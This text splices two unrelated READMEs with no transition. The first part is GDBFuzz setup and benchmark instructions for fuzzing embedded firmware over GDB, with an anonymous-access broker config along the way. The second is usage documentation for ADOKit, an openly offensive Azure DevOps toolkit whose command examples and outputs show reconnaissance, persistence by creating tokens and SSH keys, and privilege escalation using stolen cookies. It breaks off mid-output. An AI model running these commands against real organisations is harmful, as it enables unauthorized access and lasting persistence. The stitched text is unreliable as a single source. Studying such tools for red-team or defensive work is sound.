# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =


# Whether all triggered software breakpoints are considered a crash
consider_sw_breakpoint_as_error = False

[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242

[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra


[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable, and subsequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure:

.
โ”œโ”€โ”€ corpus # A folder that contains the input corpus.
โ”œโ”€โ”€ crashes # A folder that contains crashing inputs - if any.
โ”œโ”€โ”€ cfg # The control flow graph as adjacency list.
โ”œโ”€โ”€ fuzzer_stats # Statistics of the fuzzing campaign.
โ”œโ”€โ”€ plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
โ”œโ”€โ”€ reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzerTestOneInput entrypoint that is used by almost all fuzzers like AFL, AFL++, and libFuzzer. In benchmark/benchSUTs/GDBFuzz_wrapper/common there is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This makes it possible to simulate an embedded device that consumes data via a well-defined input interface, and therefore to run GDBFuzz on any application. For convenience, we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper, as explained later.
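
For a quick smoke test of such a wrapped SUT, you can push a single input into the pipe by hand. A minimal sketch follows; the exact input framing the wrapper expects is not documented here, so treat it as illustrative:

import os

PIPE = "/tmp/fromGDBFuzz"  # input interface created by the wrapper

# Opening a FIFO for writing blocks until the wrapped SUT opens the read end.
assert os.path.exists(PIPE), "start the wrapped SUT first"
with open(PIPE, "wb") as fifo:
    fifo.write(b"{}")  # one arbitrary smoke-test input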

NOTE: GDBFuzz is not intended to fuzz Linux user applications; use AFL++ or other fuzzers for that. The wrapper exists only for evaluation purposes, to enable running benchmarks and comparisons at scale!

Install and run in a Docker container

The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.

make dockerimage

To run the above experiment in the Docker container (for one hour, as specified in the config file), map the example_programs and output folders as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split into two parts: 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independent analysis and comparisons of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmware located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategies. Respective config files are in the corresponding subfolders, and we now explain how to set up fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver link
  • Connect MCU board and PC via USB (on MCU board, connect to the USB connector that is labeled as 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf. This .elf file is also used later in the user configuration for Ghidra.

Start a new terminal, and run the following to start a GDB server:

st-util

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case, /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put the board into 'Arm DAPLink' mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing e.g. with

gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add following line to the openocd config file for the J-Link debugger: jlink.cfg

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case, /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

or (more stable) build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as a non-root user with pyusb, we add appropriate rules to udev. Paste the following line into /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation-based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay the coverage against the Fuzzware results:

fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, they are stored in the crashes folder. During evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by counting a uint8_t index variable to an attacker controllable uint32_t variable within a for loop.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on a Raspberry Pi 4a (8GB)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified so that it runs on a 32-bit OS.

In the file ./dependencies/ghidra/support/launch.sh:125, the JAVA_HOME variable must therefore be hardcoded, e.g. to JAVA_HOME="/usr/lib/jvm/default-java".

  2. STLink must be at version >= 1.7 to work properly -> build it from source.

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB-compliant debug probe.
  2. The firmware file.
  3. A running GDB server and a suitable GDB application.
  4. An entry point where fuzzing should start, e.g. a parser function or an address.
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point, e.g. a serial connection.

All of these properties need to be specified in the config file, as sketched below.
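
A minimal sketch of such a config follows. The section and key names are hypothetical; copy one of the shipped example configs and adjust it rather than writing one from scratch. The comments refer to the numbered requirements above.

[SUT]
# 2: the firmware file
binary_file_path = ./my_board/firmware.elf
# 4: function (or address) where fuzzing starts
entrypoint = parse_input

[SUTConnection]
# 5: input interface from src/GDBFuzz/connections
SUT_connection_file = SerialConnection.py
serial_port = /dev/ttyUSB0

[GDB]
# 3: a suitable GDB application and the address of the running GDB server
path_to_gdb = gdb-multiarch
gdb_server_address = localhost:3333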

Run the full Benchmark (RQ4 - 8)

For RQs 4-8 we run a large-scale benchmark. First, build the Docker image as described previously and compile the applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next, adapt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your needs (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistics files, and control flow graph files for each experiment, as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature that plots the control flow graph of covered nodes. It is disabled by default. You can enable it by following the instructions in this section and setting 'enable_UI' to 'True' in the user configuration.
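
In the config file this is a single switch. The enclosing section name below is an assumption; enable_UI is the documented key, so place it wherever your example config defines it:

[LogsAndVisualizations]
# enable_UI is the documented key; the section name above is assumed
enable_UI = True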

On the host:

Install

sudo apt-get install graphviz

Install a recent version of node, for example Option 2 from here (use Option 2, not Option 1). This should install both node and npm. For reference, our version numbers are below (newer versions should work too):

โžœ node --version
v16.9.1
โžœ npm --version
7.21.1

Install web UI dependencies:

cd ./src/webui
npm install

Install the mosquitto MQTT broker, e.g. see here.

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'.
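
As an additional sanity check, you can subscribe to all topics with mosquitto_sub; once GDBFuzz is running with the UI enabled, coverage messages should appear (the topic layout depends on the GDBFuzz configuration):

mosquitto_sub -h localhost -p 1883 -t '#' -v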

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz with a user config file where enable_UI is set to True. You can use the Docker container and the arduinojson SUT from above, but make sure 'enable_UI' is set to 'True'.

Nodes shown in blue are covered; white nodes are not. We only show uncovered nodes whose parent is covered (drawing the complete control flow graph takes too much time if the graph is large).



ADOKit - Azure DevOps Services Attack Toolkit

By: Zion3R


Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Installation/Building

Libraries Used

The following third-party libraries are used in this project.

Library URL License
Fody https://github.com/Fody/Fody MIT License
Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

Pre-Compiled

  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!
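
Alternatively, the project can be built from a Developer Command Prompt instead of the IDE. A sketch, assuming the solution file is named ADOKit.sln:

nuget restore ADOKit.sln
msbuild ADOKit.sln /p:Configuration=Release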

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.

Arguments/Options

  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.
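
As a concrete illustration of how these options combine, a typical invocation looks like the following (the organization and group names are placeholders):

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"Project Administrators"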

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

Examples

Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

Syntax

Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/28/2023 3:33:01 PM
==================================================


[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check

Whoami

Use Case

Get the current user and the user's group memberships

Syntax

Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberships.

ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 11:33:12 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com


[*] INFO: Listing group memberships for the current user


Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in an Azure DevOps instance

Syntax

Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 8:41:50 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in an Azure DevOps instance

Syntax

Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 9:26:57 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in an Azure DevOps instance

Syntax

Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:44:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in an Azure DevOps instance

Syntax

Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:45:30 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in an Azure DevOps instance

Syntax

Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 3:22:21 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchcode

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in an Azure DevOps instance

Syntax

Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 11:28:34 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, valid-until date, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The PAT will be valid until 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:09 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PATs) for a given user in an Azure DevOps instance.

Syntax

Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and valid-until date for all active PATs for the user.

ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:17 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
